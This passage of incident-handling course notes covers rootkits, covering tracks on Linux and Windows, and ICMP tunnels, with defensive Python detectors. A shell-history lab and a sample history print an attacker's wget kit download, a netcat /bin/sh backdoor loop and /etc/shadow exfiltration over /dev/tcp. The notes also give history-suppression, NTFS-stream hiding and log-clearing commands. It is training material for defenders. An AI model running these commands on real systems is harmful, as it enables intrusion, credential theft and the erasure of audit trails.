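    print("pivot targets:", sorted(pivot_targets(CONNECTIONS, bad)))
    print("sweep commands:", sweep_commands(PROCESSES))
    print("roots of suspicious activity:", suspicious_roots(PROCESSES, bad))
```

suspicious_roots() returns two entry points here: hot_pics.exe, whose parent explorer.exe is clean, and metsvc.exe, whose parent is services.exe because it was installed as a service. The PPID walk alone cannot tie metsvc.exe back to hot_pics.exe; that link has to come from other evidence (install time, file path, the service's registry key), which is why the lab asks for command lines and not just parents.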

Rootkit techniques:
• Rootkits are a collection of tools that allow an attacker to:
— Keep backdoor access into a system
- Mask the fact that the system is compromised

• These goals are accomplished by altering the operating system itself
• With these capabilities, rootkits are classic examples of Trojan Horse software and very effective backdoors

• Components of rootkits have been discovered for other systems
— Several UNIX/Linux rootkits at
• Solaris, BSD, AIX, HP-UX, IRIX
— Numerous Windows rootkits used by cyber criminals are also available
— Mobile rootkits are just now getting traction
• Rootkits are increasingly being bundled with spyware and bots

Windows User-Mode Rootkit DLL Injection and API Hooking:
• EXEs and DLLs are commonly used methods for packaging code in Windows
— EXEs run, and utilize shared DLLS to get stuff done
• On Windows, anyone with the Debug right can inject a DLL into a running process ...
• ... and start it running by creating a thread in the target process.
• Hook APIs to change programs’ views of running processes, open ports, and the file system.

User-Mode Rootkit Defenses:
- Don't let the attacker get root in the first place
- Harden and patch the system thoroughly.

- Detection can be quite difficult, but some methods are available
• ls versus "echo *": the output should list the same files. This catches a trojaned ls binary, because echo * relies on the shell's own directory read rather than on /bin/ls; a kernel-mode rootkit that hooks the directory-listing system call fools both
• Nice, but not terribly practical
• There are other ways we can catch the system telling a lie, which we cover after the kernel-mode rootkit discussion

• Most rootkits do not store the password as a string, so “strings” on /bin/login will not work
• Analysis of /bin/login by automated tool to look for embedded password

• Containment
- Analyze other systems for changes made by discovered rootkits
• Eradication
- Wipe drive, and then reformat drive
- Reinstall operating system, applications, and data
- Make sure you apply all patches
- You should change all admin/root passwords on the victim and related systems
• Recovery
- Monitor system very carefully

Kernel-Mode Rootkits:
• Kernel-mode rootkits are a big area of focus
• By operating in the kernel, the attacker has complete control of the target machine
— Hidden processes
— Hidden files
— Hidden network use (sniffing and port listeners)
- Execution redirection

The publicly discussed methods for manipulating the kernel include:
1. Loadable kernel modules (UNIX) and device drivers (Windows) --> the most popular method today
2. Altering the kernel in memory
3. Changing the kernel file on the hard drive
4. Virtualizing the system
• Each is available on Linux and Windows

Method 3) Changing Kernel File on Hard Drive
• Instead of altering live kernel in memory, attackers could overwrite kernel file on the hard drive
• On Linux, the file is vmlinuz
— Whitepaper on this technique at
• On Windows, kernel functionality is in the ntoskrnl.exe and win32k.sys files
- Attacker must foil NTLDR's integrity checks of these files:
- Disable them, or...
- Make them lie (alter their code)
- The Bolzano and FunLove viruses did this in 1999, but nothing much since then.

Virtualizing the System:
Dino A. Dai Zovi is working on a similar rootkit called Vitriol, built on Intel VT-x hardware virtualization

Rootkit Examples:

• By TurboBorland
— Of Chaotic Security
• Works on 2.6+ and 3.0+ Linux kernels
• 32- and 64-bit support
• Uses driver support/loadable kernel modules
• Like many rootkits, it uses insmod to insert the various rootkit components
• Hides by modifying the results listed by lsmod
• Modifies the System Call Table
• Real-time hiding from strace
- very scary.

Avatar ROotkit:
• Uses driver infection technique twice
— Once to bypass Host Based Intrusion Detection (HIDS)
— The second is for persistence
• Uses the bootkit method of infection and persistence to bypass driver signing requirements
• An interesting mixture of user-mode and kernel-mode techniques
• Attempts to detect whether the target system is a VM
• If not installed as Admin, it will automatically attempt local privilege escalation
• Infects a random driver from a list
— Does not infect the same driver for every system
• It is able to infect system drivers without altering their size
• Custom encryption used for Command and Control (C2)

You can find it here:

Alureon/TDL Rootkit Family:
Alureon is one of the most powerful rootkits in widespread use for Windows today
- Used to hide spyware, bots, and other malware
- Original version called "TDSS", then TDL1 followed by TDL2... and now Alureon: an iterative loop growing more powerful

• Kernel-mode rootkit
— Configuration file and some DLLS present in user mode, but hidden
• Focus is on file hiding and dodging antivirus and rootkit detection tools
• For installation, Alureon alters Windows device drivers associated with the file system
— atapi.sys or iastor.sys
- Alters driver, but changes system so that driver signature check always passes.

Fontanini Rootkit (by Matias Fontanini).

Kernel-Mode Rootkit Defenses - Configuration Lockdown
• All of these attacks require the bad guy to have superuser privileges (root or Administrator)
• Harden the box by hand, or.
• Use a good security template
• The Center for Internet Security (CIS), in conjunction with NSA, NIST, and others, has developed a set of templates for Win, Lin, Solaris, HP-UX, Cisco Routers, and Oracle DBs
• They have scoring tools as well.

Defenses - Linux/UNIX Rootkit Detection Tools
• Try to catch inconsistencies introduced by a rootkit on a system
• chkrootkit, free from
- Checks for over 50 different rootkits, both user mode and kernel mode
- Runs on Linux, FreeBSD, OpenBSD, NetBSD, Solaris, HP-UX, Tru64, and BSDI
- Numerous tests:
• Look for alterations in binaries and check for interfaces in promiscuous mode
• Check link counts: each directory's link count should equal two plus the number of directories contained inside it; rootkits that hide a directory mess this up (note that some filesystems, btrfs and overlayfs among them, report a link count of 1 for every directory, which tells you nothing)
• Rootkit Hunter (rkhunter), free at
- Looks for 55 rootkits, both user mode and kernel mode
- Runs on Linux, FreeBSD, OpenBSD, AIX, and Solaris
- Also several tests, including MD5 hashes of known evil binaries, comparison of the ps process list vs. /proc, and default rootkit files
• OSSEC includes "Rootcheck" with similar features

Additional Windows Rootkit Detectors
- RootkitRevealer, by Mark Russinovich (Sysinternals)
- Other tools use techniques similar to RootkitRevealer's (compare the high-level Windows API view of the file system and registry with a low-level read of the same data and report any discrepancy):
- Sophos Anti-Rootkit
- McAfee Rootkit Detective

It's always nice to have a second (and third) opinion!

Defenses: File Integrity Checking Tools
• Look for changes to critical system files
• File integrity checking tools help
— Although a well-designed kernel-mode rootkit can trick the file integrity checker using execution redirection
— Still, if the attacker makes any unmasked changes, you’ll spot him
• Tripwire is a classic
— Also looks for registry modifications
• OSSEC is also very good
- Runs on Linux, UNIX, Mac OS X, and Windows
— Freely available at
• Other tools include:
— Ionx Data Sentinel

Network Intelligence/Forensics:
• A lot of malware tries hard to hide on the end system
- Morphing and kernel hacking
• ... but its use and propagation have definite patterns that can be observed on the network
- Strange communication pairs (scans, client->client, server->server, server->client?)
• Network-level intelligence and forensics can help detect such behavior early
- Security Onion is an outstanding network forensics distro

Get Security Onion now:

Nifty auto-detection and throttling via network-based IPS:
- NetWitness, FireEye, Sourcefire, TippingPoint, ForeScout, etc.

Kernel-Mode Rootkit Defenses: Containment, Eradication, and Recovery
• The containment, eradication, and recovery steps for kernel-mode rootkits involve the same techniques used for user-mode rootkits
- Containment
• Analyze other systems for changes made by discovered rootkits
- Eradication
• Wipe drive, and then reformat drive
• Reinstall operating system, applications, and data
• Make sure you apply all patches
• You should change all admin/root passwords on the victim and related systems
- Recovery
• Monitor system very carefully

RITA - finding bad things on your network using free and open source tools!
(from BlackHillsInfoSec company).


5.5 Covering Tracks in Linux and Unix:

Hiding Files in UNIX
• The easiest (and very effective) way to hide files is to simply name them something like ". " or ".. "
- Note: There is a space after those dots
• Or, just name a file "..." or even " " (that's a space!)
• For example:
# ls -a
. .. test.txt files
# echo hideme > ".. "
# ls -a
. .. .. test.txt files
- The new ".. " blends in next to the real ".." entry. Newer GNU ls quotes names that contain spaces ('.. '), which gives it away; ls -b or ls -Q does the same on older versions.
Of course, you can do nastier stuff using rootkits.

Where Attackers Put Hidden UNIX files and Dirs
• In addition to using dot names, attackers want to put files in a place where they won’t be noticed
• Popular locations for hidden stuff include:
— /dev
— /tmp
— /etc
— Other complex components of the file system
• /usr/local/man
• /usr/src
• Numerous others
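Both the link-count test from the rootkit-detection section and the dot-and-space names described above can be checked with a few lines of Python. This is an added example, not code from chkrootkit, rkhunter or the course: it walks a tree reporting names that consist of dots and whitespace (or carry leading or trailing whitespace), and compares each directory's link count with two plus its visible subdirectories. The demo tree is constructed in a temporary directory; filesystems that report a link count of 1 for every directory are reported as unknown rather than as findings.

```python
"""Added example (not from chkrootkit, rkhunter or the course): two ways the
filesystem gives away hidden things -- disguised dot/space names, and directory
link counts that disagree with the subdirectories you can list."""
import os
import re
import shutil
import tempfile

# ". ", ".. ", "...", " " and any name with leading or trailing whitespace
ODD_NAME = re.compile(r"^(\.{1,2}\s+|\.{3,}|\s+)$|^\s|\s$")


def find_odd_names(root):
    """(directory, name) for every entry whose name is one of the disguises above."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        hits.extend((dirpath, n) for n in dirnames + filenames if ODD_NAME.search(n))
    return sorted(hits)


def link_count_verdict(nlink, visible_subdirs):
    """chkrootkit's rule: a directory has one link from its parent, one for its
    own '.', and one for each subdirectory's '..', so nlink should be 2 + subdirs."""
    if nlink < 2:           # btrfs, overlayfs and others report 1 for every directory
        return "unknown"
    expected = 2 + visible_subdirs
    if nlink == expected:
        return "ok"
    return "hidden-subdir" if nlink > expected else "fewer-links"


def check_link_counts(root):
    """Directories whose link count disagrees with the subdirectories we can list."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        # symlinks to directories appear in dirnames but contribute no '..' link
        real = sum(1 for d in dirnames if not os.path.islink(os.path.join(dirpath, d)))
        nlink = os.lstat(dirpath).st_nlink
        verdict = link_count_verdict(nlink, real)
        if verdict not in ("ok", "unknown"):
            findings.append((dirpath, nlink, real, verdict))
    return findings


def make_demo_tree():
    """Constructed sample: a temp dir holding the disguised names from the notes."""
    root = tempfile.mkdtemp(prefix="hidden-demo-")
    os.mkdir(os.path.join(root, "..."))
    os.mkdir(os.path.join(root, "lib"))
    for name in (".. ", " ", "normal.txt", ".bashrc"):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("hideme\n")
    return root


def remove_demo_tree(root):
    shutil.rmtree(root)


if __name__ == "__main__":
    demo = make_demo_tree()
    for where, name in find_odd_names(demo):
        print(f"odd name {name!r} in {where}")
    print("link-count findings:", check_link_counts(demo))
    remove_demo_tree(demo)
```

Run it against /dev, /tmp, /etc and the other favourite hiding places listed above. A "hidden-subdir" verdict means the kernel counts a subdirectory that the listing does not show, which is exactly the lie a rootkit tells; "fewer-links" is usually a filesystem quirk rather than an attacker, so check what the mount is before raising an alarm.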

Log Editing:
Editing UNIX log files

• Main log files can be found by viewing /etc/syslog.conf (or /etc/rsyslog.conf and /etc/rsyslog.d/ on newer distros)
- Attacker might check this to find out where the logs are located
- Or just run a script that guesses where the logs are
• Of particular interest in Linux are:
- /var/log/secure
- /var/log/messages
- Logs of the particular service that was exploited to gain access, such as:
• /var/log/httpd/error_log
• /var/log/httpd/access_log
• These log files (usually in /var/log) are written in ASCII
• They are often edited by hand using a text editor or script
- If the log file is very large, they usually use a perl script to edit it

Handy commands for locating logs (the first lists every .log file under the current directory, the second lists them largest first, size being column 7 of find -ls output):
# find . -name \*.log
# find . -name \*.log -ls | sort -r -n -k7
# grep this_word this_file.txt

Don't forget Shell History:
Attackers also delete or edit their shell history files
- A list of the most recent N commands
• 500 by default in bash, although some Linux distros raise this to 1000 (including RedHat)
- ~/.bash_history, for example
- Written in ASCII, and can be edited by hand with the permissions of the user or root
- Attackers remove suspicious commands
- Some even add commands to implicate some other user in the attack (divert attention)

Editing Shell History - A Problem:
• Shell history is written when the shell is exited
• When editing shell history, the command used to invoke the editor will be placed in the shell history file
• The attacker could edit the file, exit the shell, start another shell, edit the history file again to remove it
...but it will be added again!
- A chicken-and-egg problem
• Solutions
1) Kill the shell, so that it cannot write the most recent shell history, including the command used to edit it
# kill -9 [pid] ...or...   # killall -9 bash
2) Make bash unable to write history at all: set HISTSIZE (for bash) to zero, or unset HISTFILE, then kill the current shell ($$ is its PID)
# unset HISTFILE; kill -9 $$
(once HISTFILE is unset, even a normal exit writes nothing)
• Defenders can shrink this window by having bash append to the file after every command (PROMPT_COMMAND='history -a'), by recording timestamps (HISTTIMEFORMAT), and by shipping the file off the host

Account Entries in UNIX editing:
• utmp: file contains info about currently logged in users
— Default location on Linux: /var/run/utmp
• wtmp: File contains data about past user logins
- Default location on Linux: /var/log/wtmp
• btmp: File contains bad login entries for failed login attempts
— Default location on Linux: /var/log/btmp, but often not used
• lastlog: File shows login name, port, and last login time for each user
— Default location on Linux: /var/log/lastlog

• utmp, wtmp, and btmp are not stored in ASCII
— They are stored as utmp structures
• lastlog stored in different manners on various systems
• They can be edited only using specialized tools:
— remove.c, by Simple Nomad
• Removes entries from utmp, wtmp, and lastlog
— Numerous others, including wtmped.c, marry.c, cloak.c, logwedit.c, wzap.c, etc.
— All available at

Lab: Shell History Analysis

Analyzing a Shell History File:
• On the course USB, there is a .bash_history file located in the Linux directory from the root account of a compromised system
• It’s also located inside the Linux VMware image, at /home/tools/history_exercise/.bash_history

In this lab, we will:
— Open this history file in an editor
— Analyze its contents to determine the attacker’s actions on the machine
— If you have trouble interpreting the attacker’s tactics, feel free to replicate them on your own Linux VMware system to get a better feel for the attacker’s actions.

Initial Action on the System:
• Open the history file:
$ gedit /home/tools/history_exercise/.bash_history
• When the attacker first gets access to the root account, he runs the following commands:
unname -a
uname -a
• What is the purpose of each command?
— Some possible answers follow this section
— Try to answer each question first, and review your answers at the end

File System Interactions:
• Next, the attacker executes the following commands:
mkdir /etc/initd
cd /etc/initd
wget 10.10.10.18/kit.tgz
tar xfvz kit.tgz
mv nc init
• What is the purpose of each command?

Launching Processes (I):
• Now, the attacker gets more serious:
echo "while :; do echo Started; /etc/initd/init -l -p 8080 -e /bin/sh; done" > init.conf
nohup init.conf &
nohup ./init.conf &
chmod 555 init.conf
nohup ./init.conf &
lsof -Pi | grep 8080
• What is the purpose of each command?

Launching Processes (2):
• Finally, the attacker accesses some important files and another system:
cat /etc/passwd > /dev/tcp/10.10.10.18/443
cat /etc/shadow > /dev/tcp/10.10.10.18/443
./tcpdump -n -s0 -w init.out port 80 &
vi /var/log/messages
netstat -nat
ssh tom@10.11.12.15

• What is the purpose of each command?

REMEMBER: turn on history time stamping (HISTTIMEFORMAT in bash) on your Linux and Mac systems, so that each command in a history file you review carries the time it was run!

Lab: Shell History
Some Additional Questions
• Was the attacker a human or a script?
• What specific files should the investigator look for?
• What other systems has the attacker likely compromised?

Potential Answers (1)
— Checking to see which account the attacker has gained control of on the machine
— Verifying the privileges of the current account
unname —a
— Trying to check the kernel version of the system, but with a typo in the command
uname —a
- Re-running the command, but without the typo
- checking to see whether Netcat is installed.

Potential Answers (2)
mkdir /etc/initd
— Making a directory that will blend in
cd /etc/initd
- Moving into that directory as a base of operations
wget 10.10.10.18/kit.tgz
- Pulling down a package from 10.10.10.18, likely another compromised machine
tar xfvz kit.tgz
— Opening the contents of the kit
mv nc init
- The kit must have included Netcat, which the attacker renames “init” to camouflage it.

Potential Answers (3)
echo "while :; do echo Started; /etc/initd/init -l -p 8080 -e /bin/sh; done" > init.conf
— Putting an autostart loop together for netcat listener
nohup init.conf &
— Attempting to run the loop with nohup to survive logoff ... forgot to specify the path
nohup ./init.conf &
— Now, attacker specifies path, but script isn’t executable
chmod 555 init.conf
- changing permissions to read-execute
nohup ./init.conf &
- finally running backdoor while loop
lsof -Pi | grep 8080
- verifying backdoor listener on TCP port 8080

Potential Answers (4)
cat /etc/passwd > /dev/tcp/10.10.10.18/443
cat /etc/shadow > /dev/tcp/10.10.10.18/443
— Exfiltrating /etc/passwd and /etc/shadow using /dev/tcp
./tcpdump -n -s0 -w init.out port 80 &
— Running tcpdump to grab traffic to and from port 80 into file called “init.out,” with a snaplength of zero to ensure full packet contents are stored
vi /var/log/messages
— Editing the logs
netstat -nat
— Where do we have current TCP connections?
ssh tom@
— Connecting to via ssh
— Ending the session

Some Additional Answers
• Was the attacker a human or a script?
— Likely a human, due to the typos and corrections entered in real-time.
• What specific files should the investigator look for?
— kit.tgz, init, init.conf, and init.out
• What other systems has the attacker likely compromised?
— — hosting the kit.tgz file, and the place where /etc/passwd and /etc/shadow were sent
— Possibly, as tom account
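The lab above is done by eye; the same triage can be scripted so that an investigator can run it over every history file on a box. The block below is an added example (not course material): it parses a bash history with the "#<epoch>" time-stamp lines that HISTTIMEFORMAT produces, matches each command against rules that mirror the steps in the lab, answers the "human or script?" question from typo-then-correction pairs and uneven pacing, and pulls out the other hosts that appear in fetch, exfiltration and SSH commands. The sample history is constructed for the example, reusing the lab's commands and addresses; the rule names are the example's own.

```python
import re
from datetime import datetime, timezone
from difflib import SequenceMatcher

# Constructed sample history modelled on the lab. The "#<epoch>" lines are what bash
# writes when HISTTIMEFORMAT is set, which is why the slide says to turn time stamping on.
SAMPLE_HISTORY = """\
#1577361600
whoami
#1577361605
unname -a
#1577361610
uname -a
#1577361640
mkdir /etc/initd
#1577361650
wget 10.10.10.18/kit.tgz
#1577361660
tar xfvz kit.tgz
#1577361665
mv nc init
#1577361700
echo "while :; do echo Started; /etc/initd/init -l -p 8080 -e /bin/sh; done" > init.conf
#1577361720
nohup ./init.conf &
#1577361800
cat /etc/shadow > /dev/tcp/10.10.10.18/443
#1577361820
./tcpdump -n -s0 -w init.out port 80 &
#1577361850
vi /var/log/messages
#1577361900
ssh tom@10.11.12.15
"""

# (rule name, pattern, why an investigator cares); each mirrors a step in the lab.
RULES = [
    ("lookalike-dir", re.compile(r"\bmkdir\s+/etc/init\S*"), "new directory named to blend in with init scripts"),
    ("remote-fetch", re.compile(r"\b(wget|curl)\b"), "tooling pulled down from another host"),
    ("renamed-netcat", re.compile(r"\bmv\s+nc\b"), "Netcat renamed to camouflage it"),
    ("backdoor-loop", re.compile(r"while\s*:.*-e\s*/bin/(ba)?sh"), "restart loop around a listener that hands out a shell"),
    ("nohup-detach", re.compile(r"^nohup\b"), "process detached so it survives logoff"),
    ("dev-tcp-exfil", re.compile(r">\s*/dev/tcp/"), "file contents redirected to a remote socket"),
    ("sensitive-read", re.compile(r"/etc/(shadow|passwd)\b"), "credential database read"),
    ("sniffer", re.compile(r"\btcpdump\b.*-w\b"), "packet capture written to disk"),
    ("log-edit", re.compile(r"\b(vi|vim|nano|sed)\b.*/var/log/"), "log file opened for editing"),
    ("lateral-ssh", re.compile(r"^ssh\s+\S+@\S+"), "outbound SSH to another host"),
]


def parse_history(text):
    """Return [(timestamp or None, command)] from a bash history file."""
    entries, stamp = [], None
    for line in text.splitlines():
        if re.fullmatch(r"#\d+", line):
            stamp = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
        elif line.strip():
            entries.append((stamp, line))
            stamp = None
    return entries


def triage(entries):
    """Match every command against RULES; one finding per (command, rule) hit, in history order."""
    findings = []
    for stamp, cmd in entries:
        for name, pattern, why in RULES:
            if pattern.search(cmd):
                findings.append({"time": stamp, "rule": name, "command": cmd, "why": why})
    return findings


def human_or_script(entries, similarity=0.8):
    """Typo-then-correction pairs and uneven pacing point to a person typing;
    a script neither mistypes nor pauses to think."""
    corrections = sum(1 for (_, a), (_, b) in zip(entries, entries[1:])
                      if a != b and SequenceMatcher(None, a, b).ratio() >= similarity)
    gaps = [(t2 - t1).total_seconds() for (t1, _), (t2, _) in zip(entries, entries[1:]) if t1 and t2]
    uneven = len({round(g) for g in gaps}) > 1
    return {"corrections": corrections, "uneven_pacing": uneven,
            "verdict": "human" if corrections or uneven else "script-like"}


def other_hosts(findings):
    """Hosts named in fetch, exfiltration and SSH commands: the other systems to look at."""
    hosts = set()
    for f in findings:
        for m in re.finditer(r"(?:/dev/tcp/|@|\bwget\s+(?:https?://)?)(\d{1,3}(?:\.\d{1,3}){3})", f["command"]):
            hosts.add(m.group(1))
    return sorted(hosts)


if __name__ == "__main__":
    entries = parse_history(SAMPLE_HISTORY)
    hits = triage(entries)
    for h in hits:
        print(h["time"].strftime("%H:%M:%S"), h["rule"].ljust(15), h["command"])
    print(human_or_script(entries), other_hosts(hits))
```

Without the "#<epoch>" lines the parser still works, but every timestamp is None and the pacing test degrades to the correction count alone, which is the practical cost of not having time stamping switched on beforehand.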

5.6 Covering Tracks in Windows:

Hiding Files in NTFS
If system is running NTFS, alternate data streams are supported
• Multiple streams can be attached to each file or directory
• Attacker’s files can be hidden in a stream behind normal files on the system
— Such as notepad.exe or word.exe (or anything else!)

Use the type command built into Windows
C:\> type hackstuff.exe > notepad.exe:stream1.exe
Or, use the cp program from the NT Resource Kit
C:\> cp hackstuff.exe notepad.exe:stream1.exe

• To get data back, it can be copied out of the stream
C:\> cp notepad.exe:stream1.exe hackstuff.exe
• Alternatively, you can create an alternate data stream attached to a file or directory by simply typing:
C:\> notepad <file_or_directory_name>:<stream_name>
• If you know a stream exists and you know its name, you can view its contents using the more command:
C:\> more < c:\file:stream1

Alternate Data Streams in NTFS:
• The hidden file in the stream will follow the other file around through normal copying between NTFS partitions
• On Linux machines that have connected to a Windows box with NTFS, smbclient can get data from ADSs
• But, Windows machines prior to Vista and 2008 Server offer no built-in capability for finding or deleting a stream
— To delete a stream, you could move the file to FAT partition, and then move it back
— On Vista, Win2008, and Windows 7, the dir command offers the /r option for listing ADSs:
C:\> dir /r
• Will not show ADS behind Windows reserved filenames
— COM1, COM2, LPT1, AUX, etc.

Finding Hidden Streams:
• Use an antivirus tool to find malicious code in streams (nearly all of them scan ADSs)
• Many anti-spyware tools lack ADS detection functionality
• Third-party tools for finding alternate data streams in NTFS
— LADS by Frank Heyne, at
— Streams at
• Includes an option for deleting a stream — very useful feature!

Lab: Alternate Data Streams:

• Boot your Windows machine
• Make a directory named c:\tmp (if it already exists, that's fine!)
C:\> mkdir c:\tmp
• Now, make a file in the directory:
C:\> notepad c:\tmp\test.txt
• Save some text in there, such as “hello!”
• Let's create an alternate data stream associated with the file c:\tmp\test.txt
C:\> notepad c:\tmp\test.txt:hideme.txt

• Enter text (such as “This is hidden!”), save it, and close the file.

Looking for Alternate Data Streams:
• Let’s look for the alternate data stream
C:\> dir c:\tmp
• Do you see it?
• Bring up Windows file Explorer
— Start -> Run... type explorer.exe
— Then, look at c:\tmp and c:\tmp\test.txt
— Do you see hideme.txt?
• Now, bring up the file again... you must type the full path!
C:\> notepad C:\tmp\test.txt:hideme.txt
• It’s still there!

Executable in Alternate Data Streams:
• Let’s move a copy of Netcat into an alternate data stream
C:\> type c:\tools\nc.exe > c:\tmp\test.txt:nc.exe
— You must type in the full path, starting at c:\!!!
— You can look for this file, as we did previously...
• Let’s run this copy of Netcat

— If you have Windows Vista, 7, or 2008 Server:
C:\> wmic process call create c:\tmp\test.txt:nc.exe

— If you have Windows XP or 2003:
C:\> start c:\tmp\test.txt:nc.exe
— You must do this at the command prompt, not from Start -> Run or the taskbar

• Now, type a Netcat command line, and you are rolling!
• Bring up the Task Manager (CTRL-ALT-DEL)
• What does the Netcat listener look like in the Process tab?

Using LADS:
• Now, let’s look for the alternate data stream using LADS
• Install LADS from the course USB
• Put it in the c:\tools\lads directory
• Now, let’s look for some ADSs:
C:\> c:\tools\lads\lads /S c:\tmp

• If you are on Windows Vista, 7, or 2008 Server, try running "dir /r /s c:\tmp"
• Do you see the hidden stuff?

Let's Clean Up:
• We should remove all of the alternate data streams we created.
• To do this, delete the c:\tmp directory:
C:\> del c:\tmp
C:\> rmdir c:\tmp
• Or, just drag the directory to the recycle bin to dispose of it.

Log Editing in Windows:
• In Windows, by default, event logs are stored in C:\Windows\System32\winevt\Logs
• The main event log files are:
— AppEvent.Evtx — Application-oriented events
- SecEvent.Evtx — Security events
— SysEvent.Evtx — System events (readable by all users)
• Like UNIX’s wtmp and utmp, these files are stored with a bunch of binary information and are not directly editable
— In fact, the files are write-locked on a running Windows system
• An attacker with Admin privileges can clear the log files
— Use the Event Viewer, or simply delete the file
— An all-or-nothing proposition
• An attacker can generate so many bogus, benign logs that circular log files wrap, overwriting the important events
— Not overly practical, and likely to be noticed

Editing Logs with Physical Access:
• With physical access, an attacker could boot to Linux and edit the Windows logs directly with a specialized tool
• A Linux boot disk for editing the Windows password database (SAM) can be found at http://
— Be careful when using this on a machine with the Encrypting File System (EFS) on Windows XP and 2003
— You will likely lose the EFS keys if you change the password on them
• This program cannot be used to edit logs.
- ...However it illustrates that similar techniques could be used against the event logs.

Meterpreter Log File Alterations:
• The Metasploit Meterpreter also includes a log wiping utility
— “clearev” command
— Clears all events from the Application, System, and
Security logs
• No option to specify a particular type of log or event to wipe
• Currently, it clears the event logs completely, but could be expanded in the future to line-by-line event log editing.

Defenses from Covering Tracks on Systems (1):
— Use a separate server for logging
• In UNIX, syslog to a separate server
• Windows also supports syslog, through the use of third-party tools
Evt2sys at
>> Free, small, lightweight tool that runs on Windows, reads event logs, and forwards them to a syslog server
>> Win2K, Win2003, Win 7, Win2008 and more supported; 32-bit and 64-bit versions available
SL4NT at
>> Free for 60 days

Kiwi’s syslog at
>> Free as a running application, commercial if run as a service
Snare Agent and Log Server at
>> Windows of all kinds
>> Commercial

• User Behavioral Analytics
• Microsoft Advanced Threat Analytics
• Rapid7 User Behavioral Analytics
• Exabeam

Defenses from Covering Tracks on Systems (2):

• Preparation
— Cryptographic integrity checks of log files
• Msyslog from Core Labs includes remote syslog and integrity-checking capabilities
• Identification
— Look for gaps in logs
— Look for corrupt logs
• Cont, Erad, Recov: N/A
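The two identification steps above, integrity checks and looking for gaps, are easy to demonstrate in a few lines. The block below is an added example (not course material and not Msyslog's code): each log record gets an HMAC tag that commits to the previous record's tag, so deleting or editing a line breaks every tag after it, and the verifier also reports the one case a chain alone cannot see, a truncated tail, when it is given the newest tag the remote collector received. A second function flags silent stretches and backwards jumps in time. The key and the log lines are constructed for the example.

```python
import hashlib
import hmac
from datetime import datetime, timedelta

# Constructed key: on a real deployment it lives only on the remote log collector, so an
# attacker with root on the logging host cannot re-tag a doctored file.
COLLECTOR_KEY = b"constructed-demo-key-not-for-use"
GENESIS = "0" * 64


def chain_append(chain, line, key=COLLECTOR_KEY):
    """Append `line` with a tag over (previous tag || line), linking it to everything before it."""
    prev = chain[-1][1] if chain else GENESIS
    tag = hmac.new(key, prev.encode() + b"\n" + line.encode(), hashlib.sha256).hexdigest()
    chain.append((line, tag))
    return chain


def verify_chain(chain, key=COLLECTOR_KEY, last_tag=None):
    """Return None if every record verifies, else the index of the first bad record.
    Pass `last_tag` (the newest tag the collector holds) to also catch a truncated tail,
    which the chain by itself cannot detect."""
    prev = GENESIS
    for i, (line, tag) in enumerate(chain):
        expected = hmac.new(key, prev.encode() + b"\n" + line.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, tag):
            return i
        prev = tag
    if last_tag is not None and not hmac.compare_digest(prev, last_tag):
        return len(chain)
    return None


def find_gaps(lines, max_gap=timedelta(minutes=10)):
    """Flag silent stretches and backwards jumps in an ISO-timestamped log;
    a cleared or hand-edited log usually shows one or the other."""
    stamps = [datetime.strptime(line[:19], "%Y-%m-%dT%H:%M:%S") for line in lines]
    return [(a, b) for a, b in zip(stamps, stamps[1:]) if b < a or b - a > max_gap]


# Constructed log lines in the shape rsyslog/syslog-ng produce with ISO timestamps.
SAMPLE_LOG = [
    "2019-12-26T10:00:01 host sshd[1201]: Accepted password for tom from 10.11.12.15 port 50210 ssh2",
    "2019-12-26T10:00:07 host sudo: tom : TTY=pts/0 ; PWD=/home/tom ; COMMAND=/usr/bin/id",
    "2019-12-26T10:02:15 host kernel: device eth0 entered promiscuous mode",
    "2019-12-26T10:45:30 host sshd[1201]: pam_unix(sshd:session): session closed for user tom",
]
```

The promiscuous-mode line is the trace a sniffer such as the lab's tcpdump leaves in the kernel log, and it is exactly the sort of record an attacker would remove with vi; with the chain in place the removal shows up as a verification failure on the record that followed it.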

5.7 Covering Tracks on the Network:
Tunneling and Covert Channels

• You can carry any protocol on top of any other protocol
• First protocol is encapsulated inside packets for second protocol
— Network sees only second protocol

• Example:
— X Windows over SSH
— IP inside IP
— IP over Avian Carriers (the Avian Transport Protocol!)
• RFCs 1149 and 2549

Reverse HTTP Shells:

• Will work through web proxies
— Uses HTTP GET command
— Even supports authenticating through a web proxy with static password!

ICMP Tunnels:
• Numerous tools carry data inside the payloads of ICMP packets
— Ptunnel (TCP over ICMP Echo and Reply), Loki (Linux shell), ICMPShell (Linux), PingChat (Windows chat program), ICMPCmd (Windows cmd.exe access), and more
• Let’s focus on Ptunnel
— Written by Daniel Stødle, available at http://www.cs.uit.no/~daniels/PingTunnel/
— Runs on Linux or Windows
— Carries TCP connections inside ICMP Echo and ICMP Echo Reply packets
— Author talks about using it “for those times when everything else is blocked”

Ptunnel Features:

• Attacker configures Ptunnel client to listen on a TCP port, from which it grabs data and forwards to the Ptunnel Proxy
• Attacker also configures Ptunnel client with an ultimate destination IP address
• The client program on the attacker's machine makes a TCP connection to the chosen port on localhost, the Ptunnel client sends packets to the Ptunnel proxy in ICMP payloads, and the Ptunnel proxy de-encapsulates the TCP and forwards the connection
• MD5-based challenge/response authentication between client and proxy
• Currently, no encryption between client and proxy

• Ptunnel consists of two components: the Ptunnel client and the Ptunnel proxy.

1) Ping request with TCP packet in payload.
2) Ping reply with TCP response
3) PTunnel Client received the response
4) TCP Connection to PTunnel Proxy Established over any TCP ports on the Internet.

Ptunnel consists of two components: the Ptunnel client and the Ptunnel proxy. The attacker configures the Ptunnel client to listen on a given TCP port on the localhost interface of the client machine. In addition, the attacker must configure the Ptunnel proxy, which runs on an external machine, accessible via ping packets from the Ptunnel client.
Finally, the attacker configures the Ptunnel client with a given ultimate destination address. That destination machine can provide any TCP-based service, including HTTP or Secure Shell. Note that the Ptunnel client software is configured with this destination address, which it tells to the Ptunnel proxy for each packet that it sends.
The attacker then runs some TCP-based client program on the attacker’s machine, directing it to connect to the localhost interface on the TCP port where the Ptunnel client is listening. The Ptunnel client takes the TCP packets, encapsulates them in ICMP Echo packets, and forwards the resulting packets to the Ptunnel proxy.
